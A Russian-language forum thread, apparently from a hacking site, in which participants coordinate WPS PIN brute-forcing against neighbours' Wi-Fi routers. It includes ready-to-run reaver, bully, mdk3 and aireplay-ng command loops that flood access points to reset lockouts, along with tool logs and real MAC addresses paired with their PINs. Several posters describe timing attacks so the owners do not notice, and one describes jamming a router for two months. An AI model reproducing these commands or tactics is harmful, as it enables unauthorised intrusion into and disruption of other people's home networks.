nvram - это специальная микросхема, в которой хранятся все индивидуальные настройки, в том числе пин. А файл bin/nvram - это вероятно, драйвер той микросхемы, в нем пинов нет
Большое спасибо =) Интересно а больше нет никаких способов узнать алгоритм генерации пинов не пребегая к физическому воздействию на сам роутер?
VasiliyP
26.01.2014, 23:00
Там есть еще функция wl_wscPinGen - для сброса пина в дефолтное состояние. Дефолтный пин хранится во флеши, рядом с прошивкой. Так вот, если на заводе забыли этот пин записать - эта функция генерирует его рандомно, с использованием /dev/urandom. Это показывает направление мыслей разработчиков сего девайса.
На rutracker.org есть "IDA Pro Advanced 6.1" - она понимает код от этого процессора, и стандартные сишные функции видит в этом коде, рекомендую.
80:1F:02:XX:XX:XX
WPS PIN: '71733388'
Klaatu вспомни пожалуйста у меня тут есть одна точка при досе роутер уходить в перезагрузку все делаю вручную хотелось бы чтоб все было в автомате
while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /usr/local/etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done;
andruska91
28.01.2014, 13:48
ребята помогите пожалуйста с этим
5C9:98:1B:7F:05
какой пин может быть а то я уже 41% перебрал
Добрый вечер! Помогите подобрать пароль к 64:66:B3:4F:58:EE и 64:66:B38:50:56... Действительно,TP-Link уходят в лок и надолго... Работает с mdk.... Но..., чет в последнее время не реагирует точка... Не могу разобраться в чем дело... Может,есть у кого пины...Заранее благодарна!!
pin для 10:fe:ed знает кто?
На пине 22419989 99.99% буксует, наверное что-то пропустил reaver. 10:FE:ED
На пине 22419989 99.99% буксует, наверное что-то пропустил reaver. 10:FE:ED
А с чего ты взял что 2241 первая часть?????
Ты не смотри на проценты и как он буксует....
Ты смотри, что бы пошли пакеры: М1, М2, М3, М4, М5, М6
и как только их увидишь сразу можешь считать что первая часть пина правильная!
Добрый вечер! Помогите подобрать пароль к 64:66:B3:4F:58:EE и 64:66:B38:50:56... Действительно,TP-Link уходят в лок и надолго... Работает с mdk.... Но..., чет в последнее время не реагирует точка... Не могу разобраться в чем дело... Может,есть у кого пины...Заранее благодарна!!
Ооо, братан по несчастью, сколько пинов перебрал?
Тоже такая точка на горизонте появилась.
И что ты говоришь: " чет в последнее время не реагирует точка..." Как понять не реагирует?
Ооо, братан по несчастью, сколько пинов перебрал?
Тоже такая точка на горизонте появилась.
И что ты говоришь: " чет в последнее время не реагирует точка..." Как понять не реагирует?
Ой! Да курам на смех))-вобще смешное количество-2,85%... Лочится же...
Не реагирует... Это значит,что я перезагружала точку с помощью mdk3...и следущие 10 пинов,но,это все было вручную.. Сидела и нажимала. Тут нашла алгоритм,но... Он не работает,потому как точка перестала реагировать на атаки mdk3.. Все-равно ей,не перегружается и все тут!
Ой! Да курам на смех))-вобще смешное количество-2,85%... Лочится же...
Не реагирует... Это значит,что я перезагружала точку с помощью mdk3...и следущие 10 пинов,но,это все было вручную.. Сидела и нажимала. Тут нашла алгоритм,но... Он не работает,потому как точка перестала реагировать на атаки mdk3.. Все-равно ей,не перегружается и все тут!
как так сидела нажимала? свою точку что ли взламываешь?
как так сидела нажимала? свою точку что ли взламываешь?
)))) нееее) ну я же "вижу", когда точка перезагружается)))) пербрал ривер 10 пинов-включаешь mdk, буквально... ну максимум 40 секунд и то,это много.. И переключается канал.. Остановка mdk..снова включение ривер.. Снова перебор 10-ти пинов... И так по кругу. А теперь не хочет. Коза!
)))) нееее) ну я же "вижу", когда точка перезагружается)))) пербрал ривер 10 пинов-включаешь mdk, буквально... ну максимум 40 секунд и то,это много.. И переключается канал.. Остановка mdk..снова включение ривер.. Снова перебор 10-ти пинов... И так по кругу. А теперь не хочет. Коза!
ХМ....сколько mdk запускал,ничего такого не видел,как точка перезагружается..... это как и где видно?
И вообще,то тебе очень значит везёт,что точка перезагружается сколько я напускал на разные точки mdk,то по миллиону клиентов вешал,и нифига гемморой это всё,все эти точки которые лочатся и mdk......вот и посчитай,сколько ЛЕТ будешь так взламывать ,это ж сколько раз перезагружать точку нужно,что бы пин вычислить,если пин например на 9 начинается,11000 вариантов перебрать нужно же,это пипец сколько раз перезагружаться точка будет она глюкнет просто и всё,та и хозяин дурак что ли полный сидит себе в инете,а тут бац....постоянно точка перезагружается,думаешь у него мысли не придут? Вот реально,посчитай,сколько точка будет перезагружаться,если пин находится в конце,т.е на 9 начинается,и сколько по времени это будет
это как и где видно?
это ж сколько раз перезагружать точку нужно,что бы пин вычислить,если пин например на 9 начинается,11000 вариантов перебрать нужно же,это пипец сколько раз перезагружаться точка будет она глюкнет просто и всё,та и хозяин дурак что ли полный сидит себе в инете,а тут бац....постоянно точка перезагружается,думаешь у него мысли не придут?
видно это по риверу.. Он начинает искать другой канал.. А про то,дурак хозяин или нет... Тут вопрос спорный.. Потому как я старалась не делать это вечером, когда особо все активничают. Выбирала другое время. И вот знаешь... Если это хозяйка-то врядли она бы подумала,что это ее ломают,скорее на провайдер...да и хазяин не всякий подумает.. Не так уж и много людей знают об этом... Я в процентном соотношении,плюс те,которые вобще с компом на Вы.. Таких мало,но они есть)))) А вот про mdk... Мне не очень понятно.. Потому как сталкивалась с двумя... Внешними видами... Что ли.. Хотя команда с аргументами выглядит одинаково... Одна показывает "Packets send....." ,а вторая именно количтво клиентов подсоединенных, и вот во втором внешнем виде-перезагружалась точка... В первом нет.. Не понятно)
видно это по риверу.. Он начинает искать другой канал.. А про то,дурак хозяин или нет... Тут вопрос спорный.. Потому как я старалась не делать это вечером, когда особо все активничают. Выбирала другое время. И вот знаешь... Если это хозяйка-то врядли она бы подумала,что это ее ломают,скорее на провайдер...да и хазяин не всякий подумает.. Не так уж и много людей знают об этом... Я в процентном соотношении,плюс те,которые вобще с компом на Вы.. Таких мало,но они есть)))) А вот про mdk... Мне не очень понятно.. Потому как сталкивалась с двумя... Внешними видами... Что ли.. Хотя команда с аргументами выглядит одинаково... Одна показывает "Packets send....." ,а вторая именно количтво клиентов подсоединенных, и вот во втором внешнем виде-перезагружалась точка... В первом нет.. Не понятно)
ну хорошо....вот всё таки,посчитай время,за которое сломаешь точку это ж время....перебрала 10 пинов,ну в самом лучшем случае за 10 сек,потом же пауза на mdk,ну до минуты....это ж простой,пауза(время то идёт )а если пин на вконце,на 9 короче очень долго,месяцы уйдут
та ладно там,хозяйка если и подумала бы на провайдера....роутер же перезагружается,видно же,лампочки все зажигаются......при чём тут провайдер
короче очень долго,месяцы
та ладно там,хозяйка если и подумала бы на провайдера....роутер же перезагружается,видно же,лампочки все зажигаются......при чём тут провайдер
я не говорю про необходимость. мы тут...так сказать клуб по интересам и делимся опытом..если у Вас не получилось,это не значит,что ни у кого не получится!))зачем меня убеждать,что это не стоит делать? Я сказала,что выбирала время,когда,предположитель но,хозяин мог не видеть,как зажигаются лампочки!
А с чего ты взял что 2241 первая часть?????
Ты не смотри на проценты и как он буксует....
Ты смотри, что бы пошли пакеры: М1, М2, М3, М4, М5, М6
и как только их увидишь сразу можешь считать что первая часть пина правильная!
Все пакеты идут-от М1 до М6. Ломал с помощью WiFiSlax, но заметил, что reaver в нём пропускает пины. Попробую BackTrack,
Кажется стучаться к точке можно лишь ривером или булли, и не важно откуда, из wifislax или ВackТrack (Kali) . Да, ривер иногда что-то не понимает и пропускает. Попробуй булли (bully) там же, в wifislax 4.7.2.
while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /usr/local/etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done;
В BackTrack не срабатывает, пишет, что не корректно устанавливается timeout.
И ещё-два раза с нуля гонял точку с МАК 10:FE:ED:XX:XX:XX с помощью WiFiSLAX 4.8 rc1 и WiFiSLAX 4.4 и два раза доходит до 99.99% на пине 22419989. В чём проблема, почему не даёт пароль? Посоветуйте. Спасибо.
Кажется стучаться к точке можно лишь ривером или булли, и не важно откуда, из wifislax или ВackТrack (Kali) . Да, ривер иногда что-то не понимает и пропускает. Попробуй булли (bully) там же, в wifislax 4.7.2.
В WiFiSLAX при использовании BULLY выдаёт следуюшееevice is still responding with 2000 clients connected!
Connecting Client: 00:09:5B:02:FF:4C to target AP: A0:F3:C1:58:16:50
Connecting Client: 00:09:5B:5B:17:08 to target AP: A0:F3:C1:58:16:50
AP A0:F3:C1:58:16:50 seems to be INVULNERABLE!
Device is still responding with 2500 clients connected!
Connecting Client: 00:04:5A:2D:80:1A to target AP: A0:F3:C1:58:16:50
Connecting Client: 00:09:7C:E9:6D:92 to target AP: A0:F3:C1:58:16:50
AP A0:F3:C1:58:16:50 seems to be INVULNERABLE!
Device is still responding with 3000 clients connected!
Connecting Client: 00:40:01:86:FD:89 to target AP: A0:F3:C1:58:16:50
Packets sent: 3122 - Speed: 231 packets/sec[X] Unknown frequency '-613135872' reported by interface 'mon0'
О чём написано выделенное красным и почему?
Похоже на то, что одновременно точку напрягает mdk3, но точка не уходит в перезагрузку и говорит, что выдержит. К этой точке до перезагрузки за пином можно не ходить. А Bully очень желательно запускать с указанием канала. Булли отличается от ривера хотя бы тем, что больше сообщает о происходящем.
у меня прикол в том, что после начала переборе пин - примерно через 20-30 ключей wps пропадает...и пару дней вообще не ловиться
защита на роутере?
ну хорошо....вот всё таки,посчитай время,за которое сломаешь точку это ж время....перебрала 10 пинов,ну в самом лучшем случае за 10 сек,потом же пауза на mdk,ну до минуты....это ж простой,пауза(время то идёт )а если пин на вконце,на 9 короче очень долго,месяцы уйдут
та ладно там,хозяйка если и подумала бы на провайдера....роутер же перезагружается,видно же,лампочки все зажигаются......при чём тут провайдер
СЕРЖ заканчивай толкать ШНЯГУ, у всех Mdk3 работает - кроме тебя. У кого есть интерес, тот будет сидеть и пол-года что б вломить точку.
А ты лучше сходи в отпуск на месяца два!!!
Форум немного от тебя отдохнёт.
Ой! Да курам на смех))-вобще смешное количество-2,85%... Лочится же...
Не реагирует... Это значит,что я перезагружала точку с помощью mdk3...и следущие 10 пинов,но,это все было вручную.. Сидела и нажимала. Тут нашла алгоритм,но... Он не работает,потому как точка перестала реагировать на атаки mdk3.. Все-равно ей,не перегружается и все тут!
У тебя хоть перезагружается, а на моей стоит DOS-защита, приходится заглючивать и ждать пока хозяин перезагрузит. За два месяца 1916 пинов перебрал.
У тебя хоть перезагружается, а на моей стоит DOS-защита, приходится заглючивать и ждать пока хозяин перезагрузит. За два месяца 1916 пинов перебрал.
мне кажется что скоро хозину надоест это (подумает что роутер испртился) и новый купит... и всесь наработанный успех исчезнет(((обидно...
мне кажется что скоро хозину надоест это (подумает что роутер испртился) и новый купит... и всесь наработанный успех исчезнет(((обидно...
Дело в том, что хозяин начал мучатся с первых дней, и я думаю можна было обменять в начале, роутер. Дальше, Я заглючиваю точку не навязчиво, когда к точке никто не подключен, что б не вызывать подозрения. Уже даже разобрался, как увидеть подключен кто либо по проводу к этой точке.
ladbrusencov
02.02.2014, 12:51
Всем привет!
какой может быть пин?
E0:46:9A:5C:BD:BA
после 10 не верных пинов роутер блокируется на сутки((
так что чтобы перебрать все возможные уйдет 100 лет
пожалуйста подскажите какой пин может быть на этой точке
Stalker5
02.02.2014, 16:28
WPS Transaction Failed (Code 0x02)
Народ, что делать? Как исправить эту ошибку? Из-за неё он не подбирает пароли
Кто подскажет? В Bully идёт перебор пинов, но не пишет сколько процентов. Правильно ли это? Ещё не сламал точку. И ещё-что значит такая запись:
[!] ioctl(SIOCGIWFREQ) on 'mon0' failed with '-1076795576'
[!] Using '48:02:ХХ:ХХ:ХХ' for the source MAC address
[+] Datalink type set to '127', radiotap headers present'
Спасибо.
Кто подскажет? В Bully идёт перебор пинов, но не пишет сколько процентов. Правильно ли это? Ещё не сламал точку. И ещё-что значит такая запись:
[!] ioctl(SIOCGIWFREQ) on 'mon0' failed with '-1076795576'
[!] Using '48:02:ХХ:ХХ:ХХ' for the source MAC address
[+] Datalink type set to '127', radiotap headers present'
Спасибо.
На запись не обращал внимания, а насчёт процентов - это нормально.
Что сделать, чтоб в Kali linux Live CD в открытых текстовых документах отображалась кирилица? Спасибо.
Про Kali спрашиваите тут: https://forum.antichat.ru/threadedpost3665397.html#post3665397 или тут: https://forum.antichat.ru/threadedpost3665261.html#post3665261
Но никак не в этой теме. Тут потру.
Что сделать, чтоб в Kali linux Live CD в открытых текстовых документах отображалась кирилица? Спасибо.
Попробуй проинсталировать
Попробуй проинсталировать
Не хотелось-бы устанавливать как вторую ОС.
madhatter
02.02.2014, 18:39
Вы это серьезно?
Ваш открытый текстовый документ, видимо, в какой-то не особо адекватной кодировке(!utf). iconf вам в помощь.
Вы это серьезно?
Ваш открытый текстовый документ, видимо, в какой-то не особо адекватной кодировке(!utf). iconf вам в помощь.
Кодировка ANSI. Названия документа отображаются, а то, что в документе-иероглифы.
Не хотелось-бы устанавливать как вторую ОС.
Ты можешь на флешку проинсталировать 16Gb, не объязательно на винт запихивать
binarymaster
02.02.2014, 21:06
Что сделать, чтоб в Kali linux Live CD в открытых текстовых документах отображалась кирилица? Спасибо.
Ещё вот такой вариант:
https://lists.ubuntu.com/archives/ubuntu-ru/2009-March/014569.html
Мне в BT5 помогло. Хотя, оптимальный вариант - хранить non-english текстовые файлы в UTF-8.
iconf вам в помощь.
* iconv
Nu11ers3t
02.02.2014, 23:10
WPS Transaction Failed (Code 0x02)
Народ, что делать? Как исправить эту ошибку? Из-за неё он не подбирает пароли
Обычно это из-за плохой связи с AP.
Обычно это из-за плохой связи с AP.
Либо точка уходит в лок((((
в командной строке в kali linux копируешь и вставляешь одной строкой:
while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done;
Klaatu, скажите, как увеличить мощность или продолжительность дос атаки, так как у меня есть подобная точка, только она не перезагружается (выдерживает)? Либо есть ли другой способ заставить точку перезагрузиться?
Klaatu, скажите, как увеличить мощность или продолжительность дос атаки, так как у меня есть подобная точка, только она не перезагружается (выдерживает)? Либо есть ли другой способ заставить точку перезагрузиться?
Это называется "DOS-Защита" и увеличение мощности или продолжительность дос атаки не поможет.
Надо отдельно запускать DOS-атаку, заглючивать точку и ждать пока хозяин её перезагрузит.
Radikal174
08.02.2014, 16:49
Ребята, помогите подобрать PIN на основе других модемов.
Имеются 2 адаптера и их пины:
C4:3D:C7:85:80:2A
PIN: 20205287
C4:3D:C7:A9:62:76
PIN: 26252384
Как я понял, это NETGEAR аппараты.
Нужно определить PIN для похожего аппарата его MAC C4:3D:C7:A9:5D:76
binarymaster
08.02.2014, 17:09
Ребята, помогите подобрать PIN на основе других модемов.
Имеются 2 адаптера и их пины:
C4:3D:C7:85:80:2A
PIN: 20205287
C4:3D:C7:A9:62:76
PIN: 26252384
Как я понял, это NETGEAR аппараты.
Нужно определить PIN для похожего аппарата его MAC C4:3D:C7:A9:5D:76
Вот ещё два образца:
C4:3D:C7:85:CF:4C | 26013084
C4:3D:C7:A9:7A:44 | 26214702
Зависимость не линейная, но что-то в этом есть.
Исходя из этого, с больной вероятностью, для C4:3D:C7:A9:5D:76 первая часть пина будет начинаться с 262.
Подключить бы всё это к нейронным сетям...)
Radikal174
08.02.2014, 17:16
Вот ещё два образца:
C4:3D:C7:85:CF:4C | 26013084
C4:3D:C7:A9:7A:44 | 26214702
Зависимость не линейная, но что-то в этом есть.
Исходя из этого, с больной вероятностью, для C4:3D:C7:A9:5D:76 первая часть пина будет начинаться с 262.
Подключить бы всё это к нейронным сетям...)
C4:3D:C7:A9:--:--
Получается, что начинаться будут с 262?
...
Пробовал bully, но при старте выдает сообщение, что адаптером не поддерживается частота 2412. Адаптер Alfa 036H.
[!] Bully v1.0-21 - WPS vulnerability assessment utility
[X] Unknown frequency '2412' reported by interface 'mon0'
пока не гуглил как победить проблему.
Если кто знает, подскажите. Буду благодарен.
Открываем исходники 'src/iface.h' Ищем
1, 2412000000 },
Это канал 1. Убираем эти 6 нулей для всех каналов с 1 по 14, оставляем только первые 4 цифры. Сохраняем, компилируем и устанавливаем. Всё работает. Можно и для 5GHz сетки проделать то же самое, если кому надо.
P.S. В последней версии (1.0-22 svn) список каналов начинается со строки 29.
Vikhedgehog
10.02.2014, 13:21
У кого нибудь есть пин код от 50:46:5D:6E:80:70 ?
Роутер - ASUS RT-N66U с очень жестоким WPS баном, так что буду благодарен если кто-то хотя бы первые 3 цифры найдет. Спасибо.
У кого нибудь есть пин код от 50:46:5D:6E:80:70 ?
Роутер - ASUS RT-N66U с очень жестоким WPS баном, так что буду благодарен если кто-то хотя бы первые 3 цифры найдет. Спасибо.
Если даже и будет у кого-то этот ПИН, то я сомневаюсь, что он подойдёт к твоей точке.
Открываем исходники 'src/iface.h' Ищем
1, 2412000000 },
Это канал 1. Убираем эти 6 нулей для всех каналов с 1 по 14, оставляем только первые 4 цифры. Сохраняем, компилируем и устанавливаем. Всё работает. Можно и для 5GHz сетки проделать то же самое, если кому надо.
P.S. В последней версии (1.0-22 svn) список каналов начинается со строки 29.
Что значит исходники? Где искать. Спасибо.
Alex1709
11.02.2014, 16:17
Добрый день! Есть 2 точки на которых после 10 попыток подбора WPS блокируется! Немного почитал эту ветку, увидел метод из 16 в 10 - что это за метод? И вообще реально эти точки ломануть? Если нужны BSSID и ESSID то вечером гляну. Подскажите пожалуйста!
Добрый день! Есть 2 точки на которых после 10 попыток подбора WPS блокируется! Немного почитал эту ветку, увидел метод из 16 в 10 - что это за метод? И вообще реально эти точки ломануть? Если нужны BSSID и ESSID то вечером гляну. Подскажите пожалуйста!
Думаю,что можно... Только потребуется гооораздо больше времени. И при условии,что будет корректно работать mdk3. Klaatu любезно предложил алгоритм для автоматизации процесса взлома сети именно с помощью mdk3. Получится-здорово))) У меня пока не получается((
binarymaster
12.02.2014, 11:47
Что значит исходники? Где искать. Спасибо.
https://github.com/bdpurcell/bully
Немного почитал эту ветку, увидел метод из 16 в 10 - что это за метод?
Почитай побольше, узнаешь.)
В этом треде всё есть, много раз обсуждалось.
И вообще реально эти точки ломануть? Если нужны BSSID и ESSID то вечером гляну.
BSSID нужен, ESSID не обязательно, но можно.
Всем привет.
WiFiSlax. [!] Bully v1.0-21 - WPS vulnerability assessment utility
[X] Unknown frequency '2437' reported by interface 'mon0'
Как исправить ошибку? 'src/iface.h' - как ответил BURAN на подобный вопрос в посте 1635 - я в WiFiSlax не нахожу. Спасибо.
binarymaster
12.02.2014, 16:47
'src/iface.h' - как ответил BURAN на подобный вопрос в посте 1635 - я в WiFiSlax не нахожу. Спасибо.
В WiFiSlax может и не быть исходников bully.
Скачай их, поправь значения, собери и установи.
Всем привет.
WiFiSlax. [!] Bully v1.0-21 - WPS vulnerability assessment utility
[X] Unknown frequency '2437' reported by interface 'mon0'
Как исправить ошибку? ....
Запуская bully, нужно обязательно указывать номер канала, на котором работает выбранная точка (например -с 4). Если это не помогает, то тогда действительно нужно копать глубже и шире. У меня в wifislax он нормально работает с awus036h.
Запуская bully, нужно обязательно указывать номер канала, на котором работает выбранная точка (например -с 4). Если это не помогает, то тогда действительно нужно копать глубже и шире. У меня в wifislax он нормально работает с awus036h.
Попробую с указанием канала. У меня RTL8187L.
В WiFiSlax может и не быть исходников bully.
Скачай их, поправь значения, собери и установи.
В KaliLinux тоже не знаю где искать, направлять на англоязычные сайты легче всего, а здесь расписать трудно?
filya1988
12.02.2014, 20:06
Очень нужен пин к Мак адресу 3С : 81 : D8 : 1F : 1E : ED
ROSTELECOM_1EEC
Кто знает напишите пожалуйста?
Очень нужен пин к Мак адресу 3С : 81 : D8 : 1F : 1E : ED
ROSTELECOM_1EEC
Кто знает напишите пожалуйста?
10864111
ничего не могу понять, что произошло с работой ривера
зацепился за точку NETGEAR
с командой reaver -i mon0 -b xx:xx:xx:xx:xx:xx -S -N -a -vv
шатко-валко, но перебор шел. оставил на ночь.
утром пришел, перебор остановился на 20% и зациклился в WARNING : Failed to associate with xx:xx:xx:xx:xx:xx
плюс вижу, что роутер прыгнул с 6 канала на 13ый канал.
сейчас, уже пробовал по разному и все равно не могу запустить перебор на данном роуте.
сигнал по уровню прежний.
Может кто подсказать пины к макам:
78:F5:FD huawei
70:72:3C huawei hg520, hg532
C8:64:C7 zte
84:74:2A zte
FC:C8:97 zte
90:1D:27 zte
DC:02:8E zte
D0:15:4A zte
Alex1709
13.02.2014, 20:28
Вот такие данные 2C:39:96:97:BC:В4 и ROSTELECOM_BFB3 Помогите пожалуйста подобрать WPS
Пытался использовать mdk3 против tp-link с мак 10:FE:ED:xx:xx:xx, которая заблокировала wps и не отпускает уже 3 дня. Удается только заставить точку сменить канал, а перезагрузить не получается.
Пытался использовать mdk3 против tp-link с мак 10:FE:ED:xx:xx:xx, которая заблокировала wps и не отпускает уже 3 дня. Удается только заставить точку сменить канал, а перезагрузить не получается.
Если сменила канал, значит можна дальше перебор делать. В команде reaver добавь опцию:
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -vv -S -n -N -L -c (канал)
Если сменила канал, значит можна дальше перебор делать. В команде reaver добавь опцию:
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -vv -S -n -N -L -c (канал)
Пытался вручную - wps locked причем об этом говорят и reaver, и bully. Я думал, что одного раза мало и погонял точку по разным каналам. Несколько раз сгонял ее с текущего канала - всё равно wps остаётся заблокированным. Так что в моем случае "сменила канал" это всего лишь сменила канал. Погоняю ее еще побольше, но уже без особой надежды.
Пытался вручную - wps locked причем об этом говорят и reaver, и bully. Я думал, что одного раза мало и погонял точку по разным каналам. Несколько раз сгонял ее с текущего канала - всё равно wps остаётся заблокированным. Так что в моем случае "сменила канал" это всего лишь сменила канал. Погоняю ее еще побольше, но уже без особой надежды.
Wash -i mon0 -C -s
всё равно будет показывать LOCK,
а в Reaver опция: -L
игнорирует LOCK
Wash -i mon0 -C -s
всё равно будет показывать LOCK,
а в Reaver опция: -L
игнорирует LOCK
Спасибо за совет и напоминание про параметр -L. Bully у меня не перебирает каналы, даже если указываю, а вот reaver в этом плане хорош - сам перебирает. Еще совсем убрал у mdk3 параметр -s 200, а то не всегда точку достаточно напрягал. Пошло дело, даже иногда 11 пинов даёт попробовать вместо обычных 10-ти, видимо там ограничение не на количество пинов, а по времени. И еще заметил, что точка не всегда меняет канал, а иногда остается на том же, даже по три сеанса. (Напомню, речь про точку 10:FE:ED:xx:xx:xx)
Спасибо за совет и напоминание про параметр -L. Bully у меня не перебирает каналы, даже если указываю, а вот reaver в этом плане хорош - сам перебирает. Еще совсем убрал у mdk3 параметр -s 200, а то не всегда точку достаточно напрягал. Пошло дело, даже иногда 11 пинов даёт попробовать вместо обычных 10-ти, видимо там ограничение не на количество пинов, а по времени. И еще заметил, что точка не всегда меняет канал, а иногда остается на том же, даже по три сеанса. (Напомню, речь про точку 10:FE:ED:xx:xx:xx)
Насчет мака тплинка 10:FE:ED. У меня вокруг их километр и впс у всех вскрыл обычным скриптом генератором попробуй может повезет.
Насчет мака тплинка 10:FE:ED. У меня вокруг их километр и впс у всех вскрыл обычным скриптом генератором попробуй может повезет.
Это зависит от прошивки, на более последних прошивках после нескольких пинов уходит в LOCK.
И даже Mdk3 перезагрузить не может, но можна заглючить. Я до сих пор с такой вожусь - делать то нечего....
Я до сих пор с такой вожусь - делать то нечего....
а ты попробуй тогда перед локом фейковую авторизацию сделать и подбор пинов будет идти дальше без локов но скорость подбора уменьшиться
думаешь справишься с точкой?
А то....
MDK3 вешаю до пол-ляма клиентов, а то точка отходит и остаётся в LOCKе
а ты попробуй тогда перед локом фейковую авторизацию сделать и подбор пинов будет идти дальше без локов но скорость подбора уменьшиться
это что за метод такой интересный,что бы точка не лочилась?что именно сделать нужно?
а ты попробуй тогда перед локом фейковую авторизацию сделать и подбор пинов будет идти дальше без локов но скорость подбора уменьшиться
Не сталкивался??? Расскажешь, как это???
Не сталкивался??? Расскажешь, как это???
во во,такое тоже не слышал это же сенсация! сразу отпадёт проблема с локом точек
Не сталкивался??? Расскажешь, как это???
конечно но для начала в washe точка должна показывать Locked NO а то не получиться
airodump-ng --bssid XX:XX:XX:XX:XX:XX -c номер канала mon0
останови
aireplay-ng -1 5 -o 1 -q 10 -a XX:XX:XX:XX:XX:XX mon0
в отдельном окне не закрывай
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -S -L -c 1 -vv -A
если будет ошибки убирай опцию -A
конечно но для начала в washe точка должна показывать Locked NO а то не получиться
airodump-ng --bssid XX:XX:XX:XX:XX:XX -c номер канала mon0
останови
aireplay-ng -1 5 -o 1 -q 10 -a XX:XX:XX:XX:XX:XX mon0
в отдельном окне не закрывай
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -S -L -c 1 -vv -A
если будет ошибки убирай опцию -A
Шпасибо, попробую, чуть попозже отпишусь.....
<div class="quote">
конечно но для начала в washe точка должна показывать Locked NO а то не получиться<br/>
<br/>
airodump-ng --bssid XX:XX:XX:XX:XX:XX -c номер канала mon0<br/>
останови<br/>
<br/>
aireplay-ng -1 5 -o 1 -q 10 -a XX:XX:XX:XX:XX:XX mon0<br/>
в отдельном окне не закрывай<br/>
<br/>
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -S -L -c 1 -vv -A<br/>
если будет ошибки убирай опцию -A
</div>
Шпасибо, попробую, чуть попозже отпишусь.....
Попробовал, на 2х точках что уходят в LOCK до выключения питания:
Ошибка очень частая "WARNING: Receive timeout occurred" убирал опцию -А и добавлял другие - ничего
не помогло на 2х точках.
1) BSSID: 90:F6:52:.......
Версия прошивки: 3.12.11 Build 120228 Rel.31724n
Версия оборудования: WR741ND v4 00000000
Давно добытый пароль.
2) BSSID: 64:66:B3:.......
Версия оборудования: пока что не известно
Всё ещё нет пароля.
Обе точки ушли в LOCK, фейковая авторизация им не помогла
binarymaster
14.02.2014, 23:53
Я бы не назвал эту процедуру фейковой авторизацией...
Просто reaver может либо сам проводить ассоциацию с ТД, либо с флагом -A за него это должна сделать другая программа (в данном случае aireplay-ng).
Цикличная переассоциация, возможно, помогает избавиться от блокировки WPS на некоторых роутерах, но это как-то сомнительно.
насчет WR741ND с v 4 на них работает 100 процентов проверенно мною не однократно, проверял на других точках с маком 64:70:02 и F8:1A:67 на них тоже все ок. А насчет ошибки WARNING: Receive timeout occurred она выходить и у меня но перебор идет.вот небольшой лог
[+] Trying pin 01295672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 01305678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01305678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
с другого окна идут вот такие строчки
01:19:33 Sending Authentication Request (Open System) [ACK]
01:19:33 Authentication successful
01:19:33 Sending Association Request [ACK]
01:19:33 Association successful (AID: 1)
Alex1709
15.02.2014, 01:17
Ребята помогите вот с такими данными подобрать PIN 2C:39:96:97:BC:В4 ROSTELECOM_BFB3
насчет WR741ND с v 4 на них работает 100 процентов проверенно мною не однократно, проверял на других точках с маком 64:70:02 и F8:1A:67 на них тоже все ок. А насчет ошибки WARNING: Receive timeout occurred она выходить и у меня но перебор идет.вот небольшой лог
с другого окна идут вот такие строчки
У меня тоже самое, но, суть остаётся - точка Лочится.
Всё дело в пршивке, скорее всего хозяин обновил прошивку, а вот на ней такое не прокатит.
Еще раз спасибо форумчанину Klaatu. С помощью его скрипта достучался до одного tp-link-a и увидел там интересную штуку. Там есть опция "Отключить ПИН устройства" (нужно поставить галочку). Там же сбоку написано, что ПИН отключается автоматически если обнаружатся неудачные попытки подключения, т.е. не wps отключается, а доступность ПИНа. Похоже, что картина такая: когда мы сгоняем роутер с текущего канала утилитой mdk3, он при переходе на другой канал довольно часто (не всегда) теряет эту галочку и вновь становится доступным ПИН.
Против DoS атак почти все роутеры устойчивы и уже давно. И здесь mdk3 вряд ли перегружает роутер, хотя бы потому, что по времени это происходит гораздо быстрее, чем перегрузка роутера из веб-интерфейса. Очень похоже на то, что mdk3 просто вынуждает роутер перейти на другой канал, а он при этом теряет галочку на отключении ПИНа. Если это так (надо бы проверить), то можно смело стучаться в точку в любое время и не переживать, что хозяин что-то заметит. Смена канала - это не перезагрузка, хотя, конечно, очень внимательный хозяин может заметить.
Еще раз спасибо форумчанину Klaatu. С помощью его скрипта достучался до одного tp-link-a и увидел там интересную штуку. Там есть опция "Отключить ПИН устройства" (нужно поставить галочку). Там же сбоку написано, что ПИН отключается автоматически если обнаружатся неудачные попытки подключения, т.е. не wps отключается, а доступность ПИНа. Похоже, что картина такая: когда мы сгоняем роутер с текущего канала утилитой mdk3, он при переходе на другой канал довольно часто (не всегда) теряет эту галочку и вновь становится доступным ПИН.
Против DoS атак почти все роутеры устойчивы и уже давно. И здесь mdk3 вряд ли перегружает роутер, хотя бы потому, что по времени это происходит гораздо быстрее, чем перегрузка роутера из веб-интерфейса. Очень похоже на то, что mdk3 просто вынуждает роутер перейти на другой канал, а он при этом теряет галочку на отключении ПИНа. Если это так (надо бы проверить), то можно смело стучаться в точку в любое время и не переживать, что хозяин что-то заметит. Смена канала - это не перезагрузка, хотя, конечно, очень внимательный хозяин может заметить.
